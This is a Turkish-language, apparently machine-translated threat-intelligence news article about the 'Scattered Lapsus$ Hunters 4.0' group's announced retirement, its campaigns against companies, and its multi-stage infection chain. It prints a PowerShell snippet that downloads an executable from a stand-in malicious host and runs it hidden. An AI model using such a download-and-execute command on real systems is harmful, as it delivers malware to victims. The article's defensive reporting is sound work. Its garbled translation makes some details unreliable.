8 Eylül’de “Dağınık Lapsus $ Hunters 4.0” Telegram kanalından ani ve kesin bir açıklama ortaya çıktı ve kamu operasyonlarına aniden sona erdi.
Büyük şirketleri ve kritik altyapıyı hedefleyen aylarca süren yüksek profilli kampanyalardan sonra, kolektif kalıcı bir geri çekilme ilan etti.
Bu beklenmedik kararın haberi, siber güvenlik topluluğu aracılığıyla yankılandı ve analistlerin hem grubun mirasını hem de benzer tehditlere karşı savunma için daha geniş etkilerini yeniden değerlendirmelerini istedi.
Grup ilk olarak 2024’ün başlarında bulut tabanlı hizmetler ve kurumsal ağlardaki güvenlik açıklarından yararlanmak için kötü şöhret kazandı.
Sosyal mühendislik, kimlik bilgisi hırsızlığı ve sofistike takımların bir karışımını kullanan, teknoloji devlerinden, finansal kurumlardan ve ulaşım sağlayıcılarından verileri düzenledi.
Databreaches analistleri, kampanyanın modüler mimarisinin ortaya çıkan savunma önlemlerine hızlı uyum sağlamaya izin verdiğini ve kuruluşlar güvenlik duruşlarını artırdıklarında bile grubun momentumunu sürdürdüğünü belirtti.
Etki değerlendirmeleri, Kering ve Salesforce gibi dağınık Lapsus $ Hunters 4.0 baskı şirketlerinin hızlandırılmış güvenlik açığı açıklamalarına dönüştürüldüğünü ortaya koymaktadır.
Operasyonları üretim gecikmelerine neden oldu ve acil durum yama sunumlarına zorlandı ve mağdurların milyonlarca iyileştirme çabalarına mal oldu.
Finansal hasarların ötesinde, sızdırılmış püskürtülmüş veri kümelerinin kamusal doğası, kurumsal siber güvenlik programlarına olan güveni aşındırdı.
Birçok güvenlik ekibi, bu ihlalleri sıfır tröst çerçevelerinin ve daha titiz olay müdahale oyun kitaplarının benimsenmesini hızlandıran bir dönüm noktası olarak belirtiyor.
Duyurularının ardından Databreaches araştırmacıları, gelişmiş gizleme rutinlerini gösteren arşivlenmiş yüklere gömülü özel komut dosyalarının kalıntılarını tespit ettiler.
Bu rutinler, imza tabanlı tespitten kaçınmak için kabuk parçacıklarını yinelemeli olarak şifreleyen polimorfik teknikler kullandı. Bu yöntemlerin karmaşıklığı, benzer büyüklükteki siber suçlu gruplar arasında bir operasyonel güvenlik ve planlama nadir olduğunu düşündürmektedir.
Enfeksiyon mekanizması ve başlangıç erişim
Dağınık Lapsus $ Hunters 4.0’ın başarısının kritik bir unsuru, çok aşamalı enfeksiyon mekanizmasıydı.
İlk erişim genellikle ofis belgelerinde kötü amaçlı makrolar içeren mızrak aktı e-postaları ile başladı. Makro yürütme üzerine, bir PowerShell Launcher hafif bir indirici aldı.
İndirici daha sonra gizli yürütme için Windows Management Enstrümantasyonunu (WMI) kaldıran C#tabanlı bir yük getirdi:-
$DownloadUrl = "https://malicious.example/payload.exe"
$Output = "$env:TEMP\payload.exe"
Invoke-WebRequest -Uri $DownloadUrl -OutFile $Output
Start-Process -FilePath $Output -WindowStyle HiddenYürütüldükten sonra, yük kendisini bir WMI olay aboneliği olarak kaydettirdi ve sistem başlatma işlemini otomatik olarak tetikleyerek kalıcılığı sağladı.
Meşru Windows Hizmetleri ile entegre olarak, kötü amaçlı yazılım, işlem listelerinde ve ağ günlüklerinde anomalileri en aza indirdi.
Bu enfeksiyon zinciri, e-posta filtrasyonu, makro kısıtlamalar ve sürekli uç nokta izleme dahil olmak üzere çok katmanlı savunmaların önemini vurgulamaktadır.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.